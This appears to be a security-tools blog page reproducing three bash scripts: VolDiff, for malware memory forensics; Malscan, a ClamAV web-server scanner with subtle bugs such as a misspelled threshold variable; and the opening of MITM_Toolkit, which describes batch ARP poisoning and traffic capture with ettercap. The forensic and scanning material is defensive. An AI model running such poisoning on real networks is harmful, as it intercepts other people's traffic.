ipconfig.exe (2544): S-1-5-32-544 (Administrators)
ipconfig.exe (2544): S-1-1-0 (Everyone)
ipconfig.exe (2544): S-1-5-11 (Authenticated Users)
ipconfig.exe (2544): S-1-16-16384 (System Mandatory Level)

Bash Script :

#!/bin/bash
# VolDiff malware analysis script.
# Written by Houcem Hachicha aka @aim4r.

version="0.9.1"

################################ PRINT AMAZING BANNER ################################
echo -e " _    __      ______  _ ________"
echo -e "| |  / /___  / / __ \(_) __/ __/"
echo -e "| | / / __ \/ / / / / / /_/ /_  "
echo -e "| |/ / /_/ / / /_/ / / __/ __/  "
echo -e "|___/\____/_/_____/_/_/ /_/     "

echo -e "\nVolDiff: Malware Memory Footprint Analysis (v$version)"
################################ HELP SECTION ################################
if [[ $@ =~ "--help" ]] ; then
  echo -e "\nUsage: ./VolDiff.sh BASELINE_IMAGE INFECTED_IMAGE PROFILE [OPTION]"
  echo -e "\nDirections:" 
  echo -e "1. Capture a memory dump of a clean Windows system and save it as \"baseline.raw\". This image will serve as a baseline for the analysis."
  echo -e "2. Execute your malware sample on the same system, then take a second memory dump and save it as \"infected.raw\""
  echo -e "3. Run VolDiff as follows: \"./VolDiff.sh baseline.raw infected.raw <profile>\" where <profile> is Win7SP0x86 or Win7SP1x64 etc"
  echo -e "VolDiff will save the output of a selection of volatility plugins for both memory images (baseline and infected), then it will create a report to highlight notable changes (new processes, network connections, injected code, suspicious drivers etc)."
  echo -e "\nOptions:"
  echo -e "--dependencies	display information about script dependencies and exit"
  echo -e "--help		display this help and exit"
  echo -e "--add-hints	add useful hints to the report"
  echo -e "--no-report	do not create a report"
  echo -e "--version	display script version information and exit"
  echo -e "\nTested using Volatility 2.4 (vol.py) on Windows 7 images."
  echo -e "Report bugs to houcem.hachicha[@]gmail.com"
  exit
fi

################################ VERSION INFORMATION SECTION ################################
if [[ $@ =~ "--version" ]] ; then
  echo -e "This is free software: you are free to change and redistribute it."
  echo -e "There is NO WARRANTY, to the extent permitted by law."
  echo -e "Written by Houcem Hachicha @aim4r. Report bugs to houcem.hachicha[@]gmail.com."
  exit
fi

################################ DEPENDENCIES SECTION ################################
if [[ $@ =~ "--dependencies" ]] ; then
  echo -e "Requires volatility 2.4 (vol.py) to be installed."
  exit
fi

################################ SETTING PROFILE AND FINDING PATH TO MEMORY IMAGES ################################

if [[ -f $1 ]] ; then
  baseline_memory_image=$1
  echo -e "Path to baseline memory image: $baseline_memory_image..."
elif [[ -f baseline.raw ]] ; then
  baseline_memory_image=baseline.raw
  echo -e "Path to baseline memory image is not valid or was not specified. Using default ($baseline_memory_image)..."
elif [[ -f baseline.vmem ]] ; then
  baseline_memory_image=baseline.vmem
  echo -e "Path to baseline memory image is not valid or was not specified. Using default ($baseline_memory_image)..."
else
  echo -e "Please specify a path to a baseline memory image."
  exit
fi

if [[ -f $2 ]]; then
  infected_memory_image=$2
  echo -e "Path to infected memory image: $infected_memory_image..."
elif [[ -f infected.raw ]] ; then
  infected_memory_image=infected.raw
  echo -e "Path to infected memory image is not valid or was not specified. Using default ($infected_memory_image)..."
elif [[ -f infected.vmem ]] ; then
  infected_memory_image=infected.vmem
  echo -e "Path to infected memory image is not valid or was not specified. Using default ($infected_memory_image)..."
else
  echo -e "Please specify a path to a memory image of an infected system."
  exit
fi

if [[ -z $3 ]] ; then
  #profile=Win7SP1x64
  profile=Win7SP0x86
  echo -e "Profile is not specified. Using default ($profile)..." 
elif [[ $3 != Win7SP1x64 ]] &&  [[ $3 != Win7SP0x86 ]] ; then
  profile=$3
  echo -e "WARNING: This script was only tested using Win7SP0x86 and Win7SP1x64 profiles. The specified profile ($profile) seems different!" 
else
  profile=$3
  echo -e "Profile: $profile..."
fi

################################ CREATING REPORT FOLDERS ################################
starttime=$(date +%s)
output_dir=VolDiff_$(date +%F_%R)
report=VolDiff-report.txt
mkdir $output_dir

################################ RUNING VOLATILITY PLUGINS ################################
echo -e "Running a selection of volatility plugins..."
for plugin in timeliner strings handles psxview netscan getsids pslist psscan cmdline consoles dlllist svcscan mutantscan drivermodule driverscan devicetree modscan callbacks ldrmodules privs orphanthreads malfind  
do
  echo -e "Volatility plugin "$plugin" execution in progress..."
  mkdir $output_dir/$plugin
  if [[ $plugin = "mutantscan" ]] || [[ $plugin = "handles" ]] || [[ $plugin = "privs" ]] ; then
    vol.py --profile=$profile -f $baseline_memory_image $plugin --silent &> $output_dir/$plugin/baseline-$plugin.txt
    vol.py --profile=$profile -f $infected_memory_image $plugin --silent &> $output_dir/$plugin/infected-$plugin.txt 
  elif [[ $plugin = "orphanthreads" ]]  ; then
    vol.py --profile=$profile -f $baseline_memory_image threads -F OrphanThread &> $output_dir/orphanthreads/baseline-orphanthreads.txt
    vol.py --profile=$profile -f $infected_memory_image threads -F OrphanThread &> $output_dir/orphanthreads/infected-orphanthreads.txt
  # running timeliner in background (time consuming)
  elif [[ $plugin = "timeliner" ]] ; then
    vol.py --profile=$profile -f $baseline_memory_image $plugin &> $output_dir/$plugin/baseline-$plugin.txt &
    vol.py --profile=$profile -f $infected_memory_image $plugin &> $output_dir/$plugin/infected-$plugin.txt &
  elif [[ $plugin = "strings" ]] ; then
    mkdir $output_dir/$plugin/ips-domains
    strings -a -td $baseline_memory_image > $output_dir/$plugin/baseline-$plugin.txt 
    strings -a -td $infected_memory_image > $output_dir/$plugin/infected-$plugin.txt
    diff $output_dir/$plugin/baseline-$plugin.txt $output_dir/$plugin/infected-$plugin.txt | grep -E "^>" | sed 's/^..//' &> $output_dir/$plugin/diff-$plugin.txt
    vol.py --profile=$profile -f $infected_memory_image $plugin --string-file=$output_dir/$plugin/diff-$plugin.txt &> $output_dir/$plugin/diff-$plugin-vol.txt
    rm $output_dir/$plugin/baseline-$plugin.txt $output_dir/$plugin/infected-$plugin.txt
  elif [[ $plugin = "malfind" ]] ; then
    mkdir $output_dir/$plugin/dump-dir-baseline
    mkdir $output_dir/$plugin/dump-dir-infected
    vol.py --profile=$profile -f $baseline_memory_image $plugin -D $output_dir/$plugin/dump-dir-baseline &> $output_dir/$plugin/baseline-$plugin.txt
    vol.py --profile=$profile -f $infected_memory_image $plugin -D $output_dir/$plugin/dump-dir-infected &> $output_dir/$plugin/infected-$plugin.txt
  else
    vol.py --profile=$profile -f $baseline_memory_image $plugin &> $output_dir/$plugin/baseline-$plugin.txt
    vol.py --profile=$profile -f $infected_memory_image $plugin &> $output_dir/$plugin/infected-$plugin.txt
  fi
done
wait

################################ DIFFING VOLATILITY RESULTS ################################
echo -e "Diffing output results..."
for plugin in timeliner psxview netscan getsids pslist psscan cmdline consoles dlllist handles svcscan mutantscan drivermodule driverscan devicetree callbacks ldrmodules privs orphanthreads malfind
do
  diff $output_dir/$plugin/baseline-$plugin.txt $output_dir/$plugin/infected-$plugin.txt | grep -E "^>" | sed 's/^..//' &> $output_dir/$plugin/diff-$plugin.txt
done

################################ STRINGS ANALYSIS ################################
echo -e "Hunting for IPs, domains and email addresses in memory strings..."
cat $output_dir/strings/diff-strings-vol.txt | perl -e 'while(<>){if(/(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/){print $_;}}' &>> $output_dir/strings/ips-domains/diff-ips-domains-vol.txt
cat $output_dir/strings/diff-strings-vol.txt | perl -e 'while(<>){ if(/(http|https|ftp|mail)\:[\/\w.]+/){print $_;}}' &>> $output_dir/strings/ips-domains/diff-ips-domains-vol.txt
cat $output_dir/strings/diff-strings-vol.txt | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" &>> $output_dir/strings/ips-domains/diff-ips-domains-vol.txt


################################ REPORT CREATION ################################
if [[ $@ =~ "--no-report" ]] ; then 
  endtime=$(date +%s)
  echo -e "\nAll done in $(($endtime - $starttime)) seconds. No report created." 
  exit
fi
echo -e "Creating a report..."
touch $output_dir/$report
echo -e " _    __      ______  _ ________" >> $output_dir/$report
echo -e "| |  / /___  / / __ \(_) __/ __/" >> $output_dir/$report
echo -e "| | / / __ \/ / / / / / /_/ /_  " >> $output_dir/$report
echo -e "| |/ / /_/ / / /_/ / / __/ __/  " >> $output_dir/$report
echo -e "|___/\____/_/_____/_/_/ /_/     " >> $output_dir/$report
echo -e "\nVolatility analysis report generated by VolDiff v$version (https://github.com/aim4r/VolDiff/)." >> $output_dir/$report
echo -e "Report bugs to houcem.hachicha[@]gmail.com." >> $output_dir/$report
    
for plugin in netscan pslist psscan psxview ldrmodules malfind timeliner svcscan cmdline consoles drivermodule driverscan modscan callbacks orphanthreads devicetree mutantscan getsids privs
do
  echo -e "\n\nSuspicious new $plugin entries" >> $output_dir/$report
  echo -e "=========================================================================\n" >> $output_dir/$report
  if [[ -s $output_dir/$plugin/diff-$plugin.txt ]] ; then
     # special processing for psxview
    if [[ $plugin = "psxview" ]] ; then
      cat $output_dir/psxview/diff-psxview.txt | grep "[0-9] False" > $output_dir/psxview/hidden.tmp
      if [[ -s $output_dir/psxview/hidden.tmp ]] ; then
        sed -n '2p' $output_dir/psxview/infected-psxview.txt >> $output_dir/$report
        sed -n '3p' $output_dir/psxview/infected-psxview.txt >> $output_dir/$report
        cat $output_dir/psxview/hidden.tmp >> $output_dir/$report
      else
        echo "None" >> $output_dir/$report
      fi
      rm $output_dir/psxview/hidden.tmp
    # processing pslist and psscan output
    elif [[ $plugin = "pslist"  ]] || [[ $plugin = "psscan"  ]] ; then
     sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
     sed -n '3p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
     cat $output_dir/$plugin/baseline-$plugin.txt | tr -s ' ' | cut -d " " -f 3 > $output_dir/$plugin/baseline-pids.temp
     cat $output_dir/$plugin/infected-$plugin.txt | tr -s ' ' | cut -d " " -f 3  > $output_dir/$plugin/infected-pids.temp
     diff $output_dir/$plugin/baseline-pids.temp $output_dir/$plugin/infected-pids.temp | grep -E "^>" | sed 's/^..//' | uniq &>> $output_dir/$plugin/unique-new-pids.temp
     while read pid; do
       cat $output_dir/$plugin/infected-$plugin.txt | grep $pid >> $output_dir/$report
     done < $output_dir/$plugin/unique-new-pids.temp
     rm $output_dir/$plugin/baseline-pids.temp $output_dir/$plugin/infected-pids.temp $output_dir/$plugin/unique-new-pids.temp  
    # processing ldrmodules output
    elif [[ $plugin = "ldrmodules"  ]] ; then
      cat $output_dir/$plugin/diff-$plugin.txt | grep "False" >> $output_dir/$plugin/$plugin.tmp
      if [[ -s $output_dir/$plugin/ldrmodules.tmp ]] ; then
        sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
        sed -n '3p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
        cat $output_dir/$plugin/$plugin.tmp >> $output_dir/$report  
      else
        echo "None" >> $output_dir/$report
      fi
      rm $output_dir/$plugin/$plugin.tmp
    # filtering timeliner results
    elif [[ $plugin = "timeliner" ]] ; then 
     cat $output_dir/$plugin/diff-$plugin.txt | grep "PROCESS" >> $output_dir/$plugin/$plugin.tmp
     cat $output_dir/$plugin/diff-$plugin.txt | grep "NETWORK CONNECT" >> $output_dir/$plugin/$plugin.tmp
     cat $output_dir/$plugin/diff-$plugin.txt | grep "PE HEADER (module)" >> $output_dir/$plugin/$plugin.tmp
     cat $output_dir/$plugin/diff-$plugin.txt | grep "PE HEADER (exe)" >> $output_dir/$plugin/$plugin.tmp
     cat $output_dir/$plugin/$plugin.tmp | sort >> $output_dir/$report
     rm $output_dir/$plugin/$plugin.tmp
    # processing plugins that don't need output formatting
    elif [[ $plugin = "devicetree" ]] || [[ $plugin = "orphanthreads" ]] || [[ $plugin = "cmdline" ]] || [[ $plugin = "consoles" ]] || [[ $plugin = "svcscan" ]] || [[ $plugin = "malfind" ]] || [[ $plugin = "getsids" ]] ; then
      cat $output_dir/$plugin/diff-$plugin.txt >> $output_dir/$report
    # processing other plugins
    else
      sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
      sed -n '3p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
      cat $output_dir/$plugin/diff-$plugin.txt >> $output_dir/$report
    fi
    # additional processing for malfind dumped processes 
    if [[ $plugin = "malfind" ]] ; then      
      echo -e "\n\nSuspicious ips/domains/emails found in dumped processes (malfind)" >> $output_dir/$report
      echo -e "=========================================================================\n" >> $output_dir/$report
      strings -a -td $output_dir/malfind/dump-dir-infected/* > $output_dir/malfind/dump-dir-infected/malfind-strings.temp 
      cat $output_dir/malfind/dump-dir-infected/malfind-strings.temp | grep -oE '\b(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' | uniq >> $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp
      cat $output_dir/malfind/dump-dir-infected/malfind-strings.temp | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | uniq >> $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp
      cat $output_dir/malfind/dump-dir-infected/malfind-strings.temp | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | uniq >> $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp
      if [[ -s $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp ]] ; then
        cat $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp >> $output_dir/$report  
      else
        echo "None" >> $output_dir/$report
      fi
      rm $output_dir/malfind/dump-dir-infected/infected-ip-domains.temp $output_dir/malfind/dump-dir-infected/malfind-strings.temp
    fi
    # adding comments (help for further analysis)
    if [[ $@ =~ "--add-hints" ]] ; then 
      if [[ $plugin = "drivermodule" ]] ; then 
        echo -e "\nHint: Drivers without a module (UNKNOWN) should be considered as suspicious. Use moddump -b to dump suspicious drivers from memory to disk." >> $output_dir/$report
      fi
      if [[ $plugin = "driverscan" ]] ; then 
        echo -e "\nHint: Drivers that have no associated service should be considered as suspicious. Use moddump -b to dump suspicious drivers from memory to disk." >> $output_dir/$report
      fi
      if [[ $plugin = "netscan" ]] ; then 
        echo -e "\nHint: Translate suspicious IPs to domains using Google/VirusTotal, and search for the domains in memory strings." >> $output_dir/$report
      fi
      if [[ $plugin = "privs" ]] ; then 
        echo -e "\nHint: privs was run with the -s switch. It will only show the privileges that were not enabled by default." >> $output_dir/$report
      fi
      if [[ $plugin = "malfind" ]] ; then
        echo -e "\nHint: Suspicious malfind processes were dumped to disk, and can be reversed as normal or uploaded to VT. IPs and domains from the entire memory image were dumped to disk under $output_dir/strings/ips-domains (too verbose to be included here). Use grep -A 10 and -B 10 to investigate strings located next to suspicious ones. Note that strings/diff-strings-vol.txt includes strings and associated PIDs, and thus should be grepped for suspicious PIDs, or strings." >> $output_dir/$report
      fi
      if [[ $plugin = "getsids" ]] ; then 
        echo -e "\nHint: Check the output of handles for suspicious processes, and grep for mutants, then Google those. Also grep the output of ldrmodules for any hidden dlls associated with suspicious processes. Note that the procexedump and dlldump volatility plugins can be used to respectively dump processes and DLLs from memory to disk." >> $output_dir/$report
      fi
      if [[ $plugin = "mutantscan" ]] ; then 
        echo -e "\nHint: Google mutants associated with suspicious processes." >> $output_dir/$report
      fi
      if [[ $plugin = "ldrmodules" ]] ; then 
        echo -e "\nHint: DLLs that are not located under System32 can be suspicious." >> $output_dir/$report
      fi
    fi
  else
    echo "None" >> $output_dir/$report
  fi
done
echo -e "\nEnd of report." >> $output_dir/$report

endtime=$(date +%s)
echo -e "\nAll done in $(($endtime - $starttime)) seconds, report saved to $output_dir/$report."

Source : https://github.com/aim4r

Malscan is a powerful malware scanner and leveraging.

May 5, 2015, 9:50 am
$
0
0

Malscan : Robust ClamAV-based malware scanner for web servers.

Version 1.4.3 Released: May 5, 2015 :
+ Bugfix: Corrected a logging path issue. All log files will now be correctly generated in the ‘log’ directory inside your chosen path in conf.malscan
+ Bugfix: Corrected the URL for the custom virus definitions
+ Feature: Included freshclam updates within the cron_update.sh script

Features :
– Multiple channels of malware signatures
— RFX Networks Signatures
— Metasploit Signatures
— JoshGrancell.com Signatures
— ClamAV Main Signatures
– Multiple Detection Methods
— Standard HEX or MD5 based detections
— String length detections
— MimeType mismatch detections
– Easy File Quarantining
– Built-in new file signature generation
– Customizable email notifications

Installation :
Step 1: Install ClamAV on your server
For Redhat/CentOS:
— Install the EPEL Repository using yum install epel-release
— Install clamav using yum install clamav
For Debian/Ubuntu, install directly from the repositories using apt-get install clamav
Step 2: Navigate to your clamav directory.
— For RedHat/CentOS: cd /usr/local/share/clamav
— For Debian/Ubuntu: cd /var/lib/clamav
Step 3: Clone this git repository with git clone https://github.com/jgrancell/Malscan.git
Step 4: Run the cron_update.sh script to update the signatures and build any needed directories/binaries with ./cron_update.sh
Step 5: Set the cron_update.sh to run at least daily through crontab -e setting the cronjob to run daily
– Daily: 0 2 * * * /path/to/clamav/cron_update.sh
– Twice Daily: 0 */2 * * * /path/to/clamav/cron_update.sh
*NOTE: If running daily, ensure that the update is run BEFORE any scheduled scans.*
Step 6: Run the scanner as needed
— Manually: malscan -[options] /path/to/target/directory/or/file
— Via Cronjob: 30 3 * * * /usr/local/bin/malscan -[options] /path/to/target/directory/or/file

Bash Script :

#!/bin/bash
# Malscan - Enhanced ClamAV Scanning System
# Written by Josh Grancell

VERSION="1.4.3"
DATE="May 5 2015"

## Identifying where we're running the script from
SOURCE="${BASH_SOURCE[0]}"
while [ -h "$SOURCE" ]; do # resolve $SOURCE until the file is no longer a symlink
  DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
  SOURCE="$(readlink "$SOURCE")"
  [[ $SOURCE != /* ]] && SOURCE="$DIR/$SOURCE" # if $SOURCE was a relative symlink, we need to resolve it relative to the path where the symlink file was located
done
DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"

## Loading the configuration file from the Malscan directory
source /"$DIR"/"conf.malscan"
LOGDIR="$MAINDIR/log"
####################
## DOING THE WORK ##
####################

## Parsing through the arguments
if [[ $# -eq 0 || "$1" == "-h" || "$1" == "--help" ]]; then
	## Help functionality
	echo "Malscan version $VERSION compiled on $DATE"
	echo "Configuration options can be found in conf.malscan"
	echo "Usage: malscan [options] /path/to/scanned/directory"
	echo "       -s  -- Scan the specified file or directory"
	echo "       -q  -- Quarantine a file"
	echo "       -m  -- Checks the extension to verify it matches the MIME"
	echo "       -l  -- Checks files for lines over a certain length"
	echo "       -r  -- Report a file."
	echo "       -n  -- Send email notification."
	echo "       -h  -- Display this help text"
	echo "       -v  -- Display version information"
	echo "Malscan is a robust file scanning toll that combines the"
	echo "ClamAV virus scanner with enhanced definition sets."
	exit 1	
elif [[ $# == 1 ]]; then
	if [[ "$1" == "-v" ]]; then
		echo "Malscan version $VERSION -- last update $DATE"
		exit 0
	elif [[ -f "$1" || -d "$1" ]]; then
		AVSCAN=1
		TARGET="$1"
	else
		## Help functionality
		echo "Malscan version $VERSION compiled on $DATE"
		echo "Usage: malscan [options] /path/to/scanned/directory/or/file"
		echo "       -q|--quarantine  -- Quarantine a file"
		echo "       -m|--mime-check  -- Checks the extension to verify it matches the MIME"
		echo "       -l|--line-length -- Checks files for lines over a certain length"
		echo "       -r|--report      -- Report a file."
		echo "       -n|--notify      -- Send email notification. This flag cannot be used by itself, and must be followed by -r, -q, or -m."
		echo "       -h|--help        -- See this text"
		echo "       -v|--version     -- See version information"
		echo "Malscan is a robust file scanning toll that combines the"
		echo "ClamAV virus scanner with enhanced definition sets."
		exit 1	
	fi
elif [[ $# -eq 2 ]]; then
	## Setting the scanning target
	TARGET="$2"

	## Enabling Quarantine
	if [[ "$1" =~ q ]]; then
		QUARANTINE=1
	fi

	# Enabling mime-type scanning
	if [[ "$1" =~ m ]]; then
		MIMESCAN=1
	fi

	# Enabling line length scanning
	if [[ "$1" =~ l ]]; then
		LENGTHSCAN=1
	fi

	# Enabling signature reporting
	if [[ "$1" =~ r ]]; then
		REPORT=1
	fi

	# Enabling email notification
	if [[ "$1" =~ n ]]; then
		NOTIFICATION=1
	fi

	# Enabling full scan
	if [[ "$1" =~ s ]]; then
		AVSCAN=1
	fi
elif [[ -d "$1" || -f "$1" ]]; then
	AVSCAN=1
else
	## Help functionality
	echo "Malscan version $VERSION compiled on $DATE"
	echo "Usage: malscan [options] /path/to/scanned/directory"
	echo "       -q|--quarantine  -- Quarantine a file"
	echo "       -m|--mime-check  -- Checks the extension to verify it matches the MIME"
	echo "       -l|--line-length -- Checks files for lines over a certain length"
	echo "       -r|--report      -- Report a file."
	echo "       -n|--notify      -- Send email notification. This flag cannot be used by itself, and must be followed by -r, -q, or -m."
	echo "       -h|--help        -- See this text"
	echo "       -v|--version     -- See version information"
	echo "Malscan is a robust file scanning toll that combines the"
	echo "ClamAV virus scanner with enhanced definition sets."
	exit 1
fi

## Defining the lengthscan function
function lengthscan {
	#Creating the logging directories
	LENGTHLOG="$LOGDIR"/'length-scan-'$(date +%F-%s)
	TEMPLOG=$(mktemp)	

	# Building the whitelist
	LENGTH_IGNORE=${LENGTH_WHITELIST//,/ -not -name }

	echo -e "\033[32mScanning $TARGET for files with strings longer than $LENGTH_MINIMUM characters: \033[37m"

	while IFS= read -r FILE
	do
		SIZE=$(wc -L "$FILE" | awk '{$1}')
		if [[ "$SIZE" -ge "$LENGTH_MIMIMUM" ]]; then
            echo -ne "\033[35m"
            echo "DETECTION: $FILE has been detected with a line length of $SIZE." | tee -a "$LENGTHLOG"
            echo -ne "\033[37m"
        fi
    done < <(find "$TARGET" -type f -not -name "$LENGTH_IGNORE" -print0)		

	# Checking to see if we have hits.
	if [[ -f "$LENGTHLOG" ]]; then
		# Notifying of detections
		echo -e "\033[31mSee $LENGTHLOG for a full list of detected files.\033[37m"

		# If remote logging is enabled, reporting this to our remote SSH server
		if [[ "$REMOTE_LOGGING_ENABLED" == 1 ]]; then
			rsync -avzP "$REPORTFILE" -e ssh "$REMOTE_SSH:$REMOTE_LOGGING"/"$HOSTNAME"/
		fi

		DETECTION=1
	else
		# No detections
		echo -ne "\033[32m"
		echo "No suspicious files detected." | tee -a "$LENGTHLOG"
		echo -ne "\033[37m"
		DETECTION=0
	fi
}

## Defining the mimescan function
function mimescan {
	# Creating the logging directories
	MIMELOG="$LOGDIR"/'mimecheck-'$(date +%F-%s)
	TEMPLOG=$(mktemp)

	# Sed'ing the whitelist into something we can use with find
	MIME_IGNORE=${MIME_WHITELIST//,/ -not -name }

	echo -ne "\033[32mCompiling a full list of potential files... "
	find "$TARGET" -not -name "$MIME_IGNORE" -regextype posix-extended -regex '.*.(jpg|png|gif|swf|txt|pdf)' >>"$TEMPLOG"
	echo "Completed!"
	echo -e "Searching found files for any MIME mismatch against the given extensions.\033[37m"	

	# Working through the temporary file list to match files with mimetypes.
	while IFS= read -r FILE; do
                if file "$FILE" | egrep -q '(jpg|png|gif|swf|txt|pdf).*?(PHP)'; then
                        if  [ "$(basename $FILE)" != "license.txt" ]; then
                                echo -ne "\033[35m"
                                echo "DETECTION: $FILE has been detected as a PHP file with a non-matching extension." | tee -a "$MIMELOG"
                                echo -ne "\033[37m"
                        fi
                fi
	done < <(cat "$TEMPLOG")

	# Checking to see if we have hits.
	if [[ -f "$MIMELOG" ]]; then
		# Notifying of detections
		echo -e "\033[31mSee $MIMELOG for a full list of detected files.\033[37m"

		# If remote logging is enabled, reporting this to our remote SSH server
		if [[ "$REMOTE_LOGGING_ENABLED" == 1 ]]; then
			rsync -avzP "$REPORTFILE" -e ssh "$REMOTE_SSH:$REMOTE_LOGGING"/"$HOSTNAME"/
		fi

		DETECTION=1
	else
		# No detections
		echo -ne "\033[32m"
		echo "No suspicious files detected." | tee -a "$MIMELOG"
		echo -ne "\033[37m"
		DETECTION=0
	fi
}

## Defining the scanning function
function avscan {

	CLAMSCAN=$(which clamscan)

	# Setting up the whitelist
	AVSCAN_IGNORE=${AVSCAN_WHITELIST//,/ --exclude=}

	# Creating the scan log file for this scan
	SCANLOG="$LOGDIR"/$(date +%F-%s)

	# Outputting the scanning information to stdout as well as the log file
	echo -ne "\033[31m"
	echo "--exclude=$AVSCAN_IGNORE" | xargs "$CLAMSCAN" -d "$MAINDIR"/rfxn.hdb -d "$MAINDIR"/rfxn.ndb -d "$MAINDIR"/custom.hdb -d "$MAINDIR"/custom.ndb -i -r --no-summary "$TARGET" | tee -a "$SCANLOG"
	echo -ne "\033[37m"

	## If no files were found, we'll add a note into the scanlog accordingly.
	if [[ ! -s "$SCANLOG" ]]; then
		echo -ne "\033[32m"
		echo "Malware scan completed. No malicious files found." | tee -a "$SCANLOG"
		echo -ne "\033[37m"
		DETECTION=0
	else
		echo -e "\033[31mSee $SCANLOG for a full list of detected files.\033[37m"
	fi

}

## Defining the quarantine function
function quarantine {
		## This logic actively quarantines files that are not on our whitelist
		while read -r; do
			ABSPATH=$(readlink -f "$REPLY")
			
			## Setting the detection variable to 1, which allows us to parse the correct notification
			if [[ -f "$ABSPATH" ]]; then
				DETECTION=1
			fi
			
			# Building the file structure for quarantine
			DIR=$(dirname "$ABSPATH")
			FILE=$(basename "$ABSPATH")
			mkdir -p "$QDIR"/"$DIR"
			mv "$ABSPATH" "$QDIR""$ABSPATH"

			# If remote quarantine is set up, copying these files to the remote quarantine server
			if [[ "$REMOTE_QUARANTINE_ENABLED" == 1 ]]; then
				rsync -avzP "$QDIR"/ -e ssh "$REMOTE_SSH:$REMOTE_QUARANTINE" >> /dev/null
			fi

			# Setting the files to 000 permissions so they cannot be accessed
			chmod 000 "$QDIR""$ABSPATH"
			echo -e "\033[36m$FILE quarantined and locked down in $QDIR and sent to Centauri.\033[37m" | tee -a "$LOGDIR"/quarantine.log
		done < <(cat"$SCANLOG" | cut -d: -f1)
}

function notification {
	if [[ "$DETECTION" == 1 ]]; then
		EMAIL_TMP=$(mktemp)
		{
		echo "To:$EMAIL"
		echo "From:automated-malscan-service@campbellmarketing.services"
		echo "Subject: Malware Detections: $HOSTNAME - $(date)" 
		echo "MIME-Version: 1.0"
		echo "Content-Type: text/html; charset="us-ascii" "
		echo "Content-Disposition: inline"
		echo "<!DOCTYPE html>"
		echo "<html> <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">"	
		echo "<body>"

		if [[ -n "$QUARANTINE" && -n "$AVSCAN" ]]; then
			echo "Malicious and/or suspicious files have been quarantined on $HOSTNAME. Please see $LOGDIR/quarantine.log for further information.<br />"
		elif [[ -n "$AVSCAN" ]]; then
			echo "Malicious and/or suspicious files have been identified on $HOSTNAME but HAVE NOT been quarantined. Please see $SCANLOG for further information.<br />"
		fi

		if [[ -n "$MIMECHECK" ]]; then
			echo "PHP files have been detected on $HOSTNAME that are using suspicious file extension types. Please see $MIMELOG for additional information, and investigate each file for whitelisting or quarantining.<br />"
		fi

		if [[ -n "$LENGTHSCAN" ]]; then
			echo "Files have been detected that exceed the line length threshold, and may be suspicious. Please see $LENGTHLOG for additional information, and investigate each file for whitelisting or quarantining.<br />"
		fi
		} >> "$EMAIL_TMP"

		sendmail -i -t < "$EMAIL_TMP"	
	fi
}

function report {
	# Creating the report file name
	REPORTFILE="$LOGDIR"/report-"$HOSTNAME"-$(date +%s).log

	# Generating the malware signature
	sigtool --md5 "$TARGET" >> "$REPORTFILE"

	# If remote logging is enabled, reporting this to our remote SSH server
	if [[ "$REMOTE_LOGGING_ENABLED" == 1 ]]; then
		rsync -avzP "$REPORTFILE" -e ssh "$REMOTE_SSH:$REMOTE_LOGGING"/"$HOSTNAME"/
	fi

	echo -e "\033[36mFile signatured generated and reported to Centauri for inclusion in the DB.\033[37m"
	exit 0
}


# Executing the Functions
if [[ -n "$REPORT" ]]; then
	report
fi

if [[ -n "$MIMESCAN" ]]; then
	mimescan
fi

if [[ -n "$LENGTHSCAN" ]]; then
	lengthscan
fi

if [[ -n "$AVSCAN" ]]; then
	avscan
	if [[ -n "$QUARANTINE" ]]; then
		quarantine
	fi
fi

if [[ -n "$NOTIFICATION" ]]; then
	notification
fi

# Cleaning up by chowning everything ot the clam user
chown -R "$USER":"$USER" "$MAINDIR"

exit 0

 

Download : Master.zip  | Clone Url
Source : https://github.com/jgrancell

MITM_Toolkit – A toolkit for automating MITM attack management.

May 16, 2015, 5:16 pm
$
0
0

MITM_Toolkit is A toolkit for automating MITM attack management with ettercap.
Incremental Poison
This shell script accepts 3 arguments. The interface you are using (eth1, eth2, etc…), the number of concurrent hosts you want to poison, and the name of a directory you want to output the packet captures to. When launched, it will open a separate gnome-terminal (so you have to do it in the desktop interface), and will start poisoning. To move to the next batch, just hit the ‘q’ button on that interface and it will gracefully shutdown, re-ARP the hosts (to prevent disruption), and then launch the next set. While this is happening, everything is being dumped into an organized collection of log files. Currently the script assumes the gateway is on your /24 network (so should work out of the box 90% of the time). Will be updating to support more unusual cases as well.
Bash Script :

#!/bin/bash

## Arguments <interface> <number of concurrent hosts> <Unique_Scan_Name>

function splash {
  echo ""
  echo "                 . '  ."
  echo "               ' .( '.) '"
  echo "       _     ('-.)' (`'.) '"
  echo "      |0|- -(. ')`( .-`) (-')"
  echo "   .--`+'--.  .  (' -,).(') ."
  echo "   |`-----'|   (' .) - ('. )"
  echo "   |       |    . (' `.  )"
  echo "   |  .-.  |       ` .  `"
  echo "   | (0.0) |"
  echo "   | >|=|< | INCREMENTAL"
  echo "   |  `\"`  |    POISON"
  echo "   |       |       ...just a little at a time"
  echo "   |       |"
  echo "   `-.___.-'"
  echo ""
  echo ""
}
if [ "$#" -ne 3 ]; then
  splash
  echo "Description - This script will start poisoning between the defined number of hosts and the gateway"
  echo "...As soon as each terminal is gracefully ended with 'q', the next one will begin"
  echo ""
